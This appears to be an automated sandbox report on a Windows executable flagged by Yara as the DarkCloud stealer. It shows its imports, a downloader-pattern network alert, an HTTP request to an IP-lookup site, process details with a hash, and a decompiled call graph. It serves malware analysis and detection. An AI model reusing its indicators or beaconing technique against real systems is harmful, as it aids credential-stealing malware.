                                                        RT_ICON0x3e5200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.19623655913978494
                                                        RT_ICON0x3e3f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.4155405405405405
                                                        RT_GROUP_ICON0x3e3c80x30data1.0
                                                        RT_VERSION0x3e1a00x228dataEnglishUnited States0.4891304347826087
                                                        DLLImport
                                                        MSVBVM60.DLL__vbaVarTstGt, __vbaVarSub, __vbaNextEachAry, _CIcos, _adj_fptan, __vbaStrI4, __vbaHresultCheck, __vbaVarMove, __vbaVarVargNofree, __vbaCyMul, __vbaAryMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaPut3, __vbaFreeVarList, _adj_fdiv_m64, __vbaFpCDblR8, __vbaVarIndexStore, __vbaNextEachVar, __vbaFreeObjList, __vbaStrErrVarCopy, __vbaVarIndexLoadRef, _adj_fprem1, __vbaResume, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaStrDate, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaVarXor, __vbaLateMemSt, __vbaVarIndexLoadRefLock, __vbaVarForInit, __vbaForEachCollObj, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarIndexLoad, __vbaBoolVar, __vbaBoolVarNull, __vbaRefVarAry, __vbaVarTstLt, _CIsin, __vbaErase, __vbaVarCmpGt, __vbaNextEachCollObj, __vbaVarZero, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaPutOwner3, __vbaAryConstruct2, __vbaVarTstEq, __vbaDateR8, __vbaI2I4, __vbaObjVar, DllFunctionCall, __vbaVarLateMemSt, __vbaVarOr, __vbaFpUI1, __vbaRedimPreserve, __vbaLbound, _adj_fpatan, __vbaFixstrConstruct, __vbaR8Cy, __vbaRedim, __vbaUI1ErrVar, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, __vbaObjIs, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaStr2Vec, __vbaVarMul, __vbaStrUI1, __vbaUI1I4, __vbaExceptHandler, __vbaPrintFile, __vbaStrToUnicode, __vbaExitEachAry, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaInStrVar, __vbaUbound, __vbaStrVarVal, __vbaGetOwner3, __vbaVarCat, __vbaDateVar, __vbaI2Var, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaInStr, __vbaVar2Vec, __vbaVarLateMemCallLdRf, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaVarSetObj, __vbaStrCopy, __vbaVarNot, __vbaFreeStrList, _adj_fdivr_m32, __vbaPowerR8, _adj_fdiv_r, __vbaVarTstNe, __vbaVarSetVar, __vbaI4Var, __vbaVarCmpEq, __vbaForEachAry, __vbaAryLock, __vbaVarAdd, __vbaLateMemCall, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaVarCopy, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaUI1Str, __vbaCastObj, __vbaAryCopy, __vbaStrMove, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, __vbaUI1Var, __vbaVarForNext, _CIexp, __vbaMidStmtBstr, __vbaI4ErrVar, __vbaFreeStr, __vbaFreeObj, __vbaRecAssign
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-09T14:31:07.011552+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949712162.55.60.280TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 9, 2024 14:31:05.614801884 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:05.734174013 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:05.734426022 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:05.734692097 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:05.853991032 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011470079 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011502981 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011518002 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011552095 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.011605024 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.011754036 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011769056 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011782885 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.011809111 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.011837006 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.012039900 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.012063026 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.012075901 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.012093067 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.012114048 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.012490034 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.012535095 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.131200075 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.131298065 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.131328106 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.131367922 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.135382891 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.135469913 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.203634977 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.203660011 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.203735113 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.207880020 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.207963943 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.208053112 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.208098888 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.216103077 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.216170073 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.216196060 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.216228962 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.224054098 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.224132061 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.224153042 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.224189997 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.232383966 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.232445002 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:31:07.232491970 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:31:07.232542038 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:32:54.897342920 CET4971280192.168.2.9162.55.60.2
                                                        Dec 9, 2024 14:32:55.017136097 CET8049712162.55.60.2192.168.2.9
                                                        Dec 9, 2024 14:32:55.017242908 CET4971280192.168.2.9162.55.60.2
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 9, 2024 14:31:04.888655901 CET5729453192.168.2.91.1.1.1
                                                        Dec 9, 2024 14:31:05.597604036 CET53572941.1.1.1192.168.2.9
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 9, 2024 14:31:04.888655901 CET192.168.2.91.1.1.10xbf81Standard query (0)showip.netA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 9, 2024 14:31:05.597604036 CET1.1.1.1192.168.2.90xbf81No error (0)showip.net162.55.60.2A (IP address)IN (0x0001)false
                                                        • showip.net
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.949712162.55.60.2807416C:\Users\user\Desktop\AGrsqxaSjd.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 9, 2024 14:31:05.734692097 CET58OUTGET / HTTP/1.1
                                                        User-Agent: Project1
                                                        Host: showip.net
                                                        Dec 9, 2024 14:31:07.011470079 CET1236INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Headers: *
                                                        Access-Control-Allow-Methods: *
                                                        Access-Control-Allow-Origin: *
                                                        Content-Type: text/html;charset=utf-8
                                                        Date: Mon, 09 Dec 2024 13:31:06 GMT
                                                        Server: Caddy
                                                        Transfer-Encoding: chunked
                                                        Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                        Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                        Dec 9, 2024 14:31:07.011502981 CET1236INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                        Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;
                                                        Dec 9, 2024 14:31:07.011518002 CET1236INData Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72
                                                        Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
                                                        Dec 9, 2024 14:31:07.011754036 CET388INData Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20
                                                        Data Ascii: ge"))||(C()?A("Microsoft Edge"):B("Edg/"))||C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
                                                        Dec 9, 2024 14:31:07.011769056 CET1236INData Raw: 61 72 20 62 3d 48 28 61 29 3b 31 21 3d 3d 28 62 26 31 29 26 26 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 28 61 29 26 26 28 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c
                                                        Data Ascii: ar b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b|1))} var H=F?function(a){return a[F]|0}:function(a){return a.g|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a
                                                        Dec 9, 2024 14:31:07.011782885 CET1236INData Raw: 65 3d 61 2e 6c 65 6e 67 74 68 2c 66 3d 64 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 61 5b 66 5d 3b 6e 75 6c 6c 21 3d 67 26 26 67 21 3d 3d 63 26 26 28 63 5b 66 2d 62 5d 3d 67 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d
                                                        Data Ascii: e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Array.isArray(a)&&ta&&null!=a&&a i
                                                        Dec 9, 2024 14:31:07.012039900 CET1236INData Raw: 28 65 2c 66 29 26 26 28 62 5b 66 5d 3d 63 28 65 5b 66 5d 29 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 44 61 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 69 66 28 6e 75 6c 6c 21 3d 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72
                                                        Data Ascii: (e,f)&&(b[f]=c(e[f]))}return a}function Da(a,b,c,d,e,f){if(null!=a){if(Array.isArray(a))a=e&&0==a.length&&H(a)&1?void 0:f&&H(a)&2?a:Ea(a,b,c,void 0!==d,e,f);else if(N(a)){var g={},h;for(h in a)Object.prototype.hasOwnProperty.call(a,h)&&(g[h]=D
                                                        Dec 9, 2024 14:31:07.012063026 CET1236INData Raw: 66 28 63 3e 3d 66 7c 7c 65 29 7b 65 3d 62 3b 69 66 28 62 26 32 35 36 29 66 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 64 29 72 65 74 75 72 6e 3b 66 3d 61 5b 66 2b 28 28 62 3e 3e 39 26 31 29 2d 31 29 5d
                                                        Data Ascii: f(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)} function La(a,b){var c
                                                        Dec 9, 2024 14:31:07.012075901 CET1236INData Raw: 72 65 61 6b 7d 66 3d 21 30 7d 65 3d 62 3b 63 3d 21 63 3b 67 3d 4a 28 61 2e 68 29 3b 61 3d 4c 28 67 29 3b 67 3d 28 67 3e 3e 39 26 31 29 2d 31 3b 66 6f 72 28 76 61 72 20 68 2c 6b 2c 77 3d 30 3b 77 3c 64 2e 6c 65 6e 67 74 68 3b 77 2b 2b 29 69 66 28
                                                        Data Ascii: reak}f=!0}e=b;c=!c;g=J(a.h);a=L(g);g=(g>>9&1)-1;for(var h,k,w=0;w<d.length;w++)if(k=d[w],k<a){k+=g;var r=e[k];null==r?e[k]=c?O:wa():c&&r!==O&&va(r)}else h||(r=void 0,e.length&&N(r=e[e.length-1])?h=r:e.push(h={})),r=h[k],null==h[k]?h[k]=c?O:wa(
                                                        Dec 9, 2024 14:31:07.012490034 CET1236INData Raw: 6e 63 74 69 6f 6e 20 57 61 28 61 29 7b 74 68 69 73 2e 67 3d 61 7c 7c 70 2e 64 6f 63 75 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 7d 57 61 2e 70 72 6f 74 6f 74 79 70 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29
                                                        Data Ascii: nction Wa(a){this.g=a||p.document||document}Wa.prototype.appendChild=function(a,b){a.appendChild(b)}; function Xa(a,b){a.src=b instanceof V&&b.constructor===V?b.g:"type_error:TrustedResourceUrl";var c,d;(c=(b=null==(d=(c=(a.ownerDocumen
                                                        Dec 9, 2024 14:31:07.131200075 CET1236INData Raw: 28 61 29 7b 69 66 28 61 2e 69 2e 62 6f 64 79 26 26 21 61 2e 6d 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 62 28 61 29 3b 70 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 62 28 61 2c
                                                        Data Ascii: (a){if(a.i.body&&!a.m){var b=function(){fb(a);p.setTimeout(function(){return gb(a,3)},50)};Za(a.l,a.u,2,!0,function(){p[a.o]||b()},b);a.m=!0}} function fb(a){for(var b=W(1,5),c=0;c<b;c++){var d=X(a);a.i.body.appendChild(d);a.j.push(d)}b=


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:08:31:00
                                                        Start date:09/12/2024
                                                        Path:C:\Users\user\Desktop\AGrsqxaSjd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\AGrsqxaSjd.exe"
                                                        Imagebase:0x400000
                                                        File size:411'648 bytes
                                                        MD5 hash:065753739A03F973E392FF9D2E744D44
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000000.1328576742.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:08:31:03
                                                        Start date:09/12/2024
                                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x270000
                                                        File size:418'304 bytes
                                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:8.9%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:236
                                                          execution_graph 11849 412e6c 11850 412e80 11849->11850 11851 41549d __vbaErrorOverflow 11849->11851 11852 412e9b 11850->11852 11853 41535a 8 API calls 11850->11853 11854 412f05 __vbaGenerateBoundsError 11852->11854 11857 412eb6 11852->11857 11856 412f11 6 API calls 11854->11856 11860 412f97 11856->11860 11861 41397b 11856->11861 11858 412ee8 __vbaGenerateBoundsError 11857->11858 11859 412edc 11857->11859 11858->11859 11859->11856 11863 412fa4 __vbaNew2 11860->11863 11864 412fbe 11860->11864 11862 4139e7 __vbaGenerateBoundsError 11861->11862 11865 413997 11861->11865 11866 4139f3 6 API calls 11862->11866 11863->11864 11867 41303a __vbaGenerateBoundsError 11864->11867 11872 412fea 11864->11872 11868 4139ca __vbaGenerateBoundsError 11865->11868 11869 4139be 11865->11869 11870 4146a1 11866->11870 11871 413a7a 11866->11871 11873 413046 __vbaStrCat __vbaChkstk 11867->11873 11868->11869 11869->11866 11874 41470b __vbaGenerateBoundsError 11870->11874 11880 4146bc 11870->11880 11875 413aa1 11871->11875 11876 413a87 __vbaNew2 11871->11876 11877 413011 11872->11877 11878 41301d __vbaGenerateBoundsError 11872->11878 11881 4130bf 11873->11881 11879 414717 6 API calls 11874->11879 11886 413b1c __vbaGenerateBoundsError 11875->11886 11892 413acd 11875->11892 11876->11875 11877->11873 11878->11877 11884 41479d 11879->11884 11885 41534e 11879->11885 11882 4146e2 11880->11882 11883 4146ee __vbaGenerateBoundsError 11880->11883 11887 4130d0 __vbaHresultCheckObj 11881->11887 11888 4130f6 11881->11888 11882->11879 11883->11882 11890 4147c4 11884->11890 11891 4147aa __vbaNew2 11884->11891 11889 413b28 __vbaStrCat __vbaChkstk 11886->11889 11893 413100 __vbaFreeVar 11887->11893 11888->11893 11896 413ba1 11889->11896 11899 414840 __vbaGenerateBoundsError 11890->11899 11900 4147f0 11890->11900 11891->11890 11894 413af3 11892->11894 11895 413aff __vbaGenerateBoundsError 11892->11895 11897 413133 11893->11897 11898 413119 __vbaNew2 11893->11898 11894->11889 11895->11894 11902 413bb2 __vbaHresultCheckObj 11896->11902 11903 413bd8 11896->11903 11912 413177 __vbaHresultCheckObj 11897->11912 11913 41319d 11897->11913 11898->11897 11901 41484c __vbaStrCat __vbaChkstk 11899->11901 11904 414823 __vbaGenerateBoundsError 11900->11904 11905 414817 11900->11905 11907 4148c5 11901->11907 11906 413be2 __vbaFreeVar 11902->11906 11903->11906 11904->11905 11905->11901 11908 413c15 11906->11908 11909 413bfb __vbaNew2 11906->11909 11910 4148d6 __vbaHresultCheckObj 11907->11910 11911 4148fc 11907->11911 11917 413c84 11908->11917 11918 413c5e __vbaHresultCheckObj 11908->11918 11909->11908 11914 414906 __vbaFreeVar 11910->11914 11911->11914 11912->11913 11919 413200 11913->11919 11920 4131dd __vbaHresultCheckObj 11913->11920 11915 414939 11914->11915 11916 41491f __vbaNew2 11914->11916 11925 414982 __vbaHresultCheckObj 11915->11925 11926 4149a8 11915->11926 11916->11915 11921 413c8e __vbaObjSet __vbaForEachCollObj 11917->11921 11918->11921 11922 41320a __vbaObjSet __vbaForEachCollObj __vbaFreeObj 11919->11922 11920->11922 11923 4144b0 11921->11923 11924 41396e 11922->11924 11927 413cda __vbaStrCopy 11923->11927 11928 4144bd __vbaStrCopy 11923->11928 11924->11861 11929 413262 __vbaStrCopy 11924->11929 11931 4149b2 __vbaObjSet __vbaForEachCollObj 11925->11931 11926->11931 11930 42ecb0 124 API calls 11927->11930 11932 42ecb0 124 API calls 11928->11932 11933 42ecb0 124 API calls 11929->11933 11934 413cf8 __vbaStrMove __vbaStrCopy __vbaStrMove 11930->11934 11935 4151d4 11931->11935 11936 4144db __vbaStrMove __vbaStrCopy 11932->11936 11938 413280 __vbaStrMove __vbaStrCopy 11933->11938 11939 42ddc0 20 API calls 11934->11939 11940 4151e1 __vbaStrCopy 11935->11940 11941 4149fe __vbaStrCopy 11935->11941 11937 42ecb0 124 API calls 11936->11937 11943 4144fd __vbaStrMove __vbaStrCopy __vbaStrMove __vbaStrCopy __vbaStrMove 11937->11943 11945 42ecb0 124 API calls 11938->11945 11946 413d3d __vbaStrMove __vbaStrCopy 11939->11946 11942 42ecb0 124 API calls 11940->11942 11944 42ecb0 124 API calls 11941->11944 11947 4151ff __vbaStrMove __vbaStrCopy __vbaStrMove 11942->11947 11948 42ddc0 20 API calls 11943->11948 11949 414a1c __vbaStrMove __vbaStrCopy __vbaStrMove 11944->11949 11950 4132a2 __vbaStrMove __vbaStrCopy __vbaStrMove 11945->11950 11951 42ecb0 124 API calls 11946->11951 11952 42ddc0 20 API calls 11947->11952 11953 414575 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 11948->11953 11954 42ddc0 20 API calls 11949->11954 11988 4132ed 11950->11988 11955 413d5f __vbaStrMove __vbaStrCopy __vbaStrMove 11951->11955 11956 41524b 18 API calls 11952->11956 11957 42ddc0 20 API calls 11953->11957 11958 414a61 __vbaStrMove __vbaStrCopy 11954->11958 11959 42ddc0 20 API calls 11955->11959 11956->11885 11962 4132fe __vbaHresultCheckObj 11962->11988 11968 413360 __vbaHresultCheckObj 11968->11988 11972 4133c0 __vbaHresultCheckObj 11973 4133ed __vbaStrCopy __vbaStrMove 11972->11973 11973->11988 11977 41343e __vbaHresultCheckObj 11977->11988 11982 4134a0 __vbaHresultCheckObj 11982->11988 11988->11962 11988->11968 11988->11972 11988->11973 11988->11977 11988->11982 11991 413500 __vbaHresultCheckObj 11988->11991 11996 42ddc0 20 API calls 11988->11996 11991->11988 11999 413541 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 11996->11999 12001 42ddc0 20 API calls 11999->12001 12004 413587 12 API calls 12001->12004 16192 434777 16193 434788 16192->16193 16194 4375dc __vbaErrorOverflow 16192->16194 16195 4347a3 __vbaStrCopy 16193->16195 16196 435da0 __vbaUbound __vbaI2I4 16193->16196 16197 42ecb0 124 API calls 16195->16197 16201 435dff 16196->16201 16198 4347c1 __vbaStrMove __vbaStrCopy __vbaStrMove 16197->16198 16200 42ddc0 20 API calls 16198->16200 16202 434806 __vbaStrMove 16200->16202 16203 43755a __vbaAryDestruct __vbaAryDestruct 16201->16203 16207 435e84 __vbaGenerateBoundsError 16201->16207 16211 435e3e 16201->16211 16204 43481a 16202->16204 16205 43486c __vbaGenerateBoundsError 16202->16205 16203->16194 16204->16205 16210 434826 16204->16210 16208 434878 7 API calls 16205->16208 16209 435e90 __vbaStrCat __vbaStrMove 16207->16209 16217 434cc0 __vbaStrCopy 16208->16217 16218 434926 __vbaStrCopy 16208->16218 16214 42f340 16209->16214 16215 434852 __vbaGenerateBoundsError 16210->16215 16216 434846 16210->16216 16212 435e6a __vbaGenerateBoundsError 16211->16212 16213 435e5e 16211->16213 16212->16213 16213->16209 16219 435ec6 __vbaAryMove __vbaFreeStr 16214->16219 16215->16216 16216->16208 16220 42ecb0 124 API calls 16217->16220 16221 43499e __vbaGenerateBoundsError 16218->16221 16222 43494d 16218->16222 16219->16203 16224 435ef6 __vbaUbound __vbaI2I4 16219->16224 16225 434cde __vbaStrMove __vbaStrCopy __vbaStrMove 16220->16225 16223 4349aa #712 __vbaStrMove __vbaLenBstr #709 16221->16223 16222->16221 16226 434958 16222->16226 16223->16194 16227 434a21 #619 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaStrCopy 16223->16227 16228 435f49 16224->16228 16229 42ddc0 20 API calls 16225->16229 16230 434984 __vbaGenerateBoundsError 16226->16230 16231 434978 16226->16231 16232 42ecb0 124 API calls 16227->16232 16228->16203 16234 435f5d __vbaStrCopy 16228->16234 16233 434d23 __vbaStrMove 16229->16233 16230->16231 16231->16223 16235 434a6e __vbaStrMove __vbaStrCopy __vbaStrMove 16232->16235 16236 434d37 16233->16236 16237 434d89 __vbaGenerateBoundsError 16233->16237 16238 42ecb0 124 API calls 16234->16238 16240 42ddc0 20 API calls 16235->16240 16236->16237 16242 434d43 16236->16242 16241 434d95 7 API calls 16237->16241 16239 435f7b __vbaStrMove __vbaStrCopy __vbaStrMove 16238->16239 16243 42ddc0 20 API calls 16239->16243 16244 434ab3 __vbaStrMove __vbaAryLock 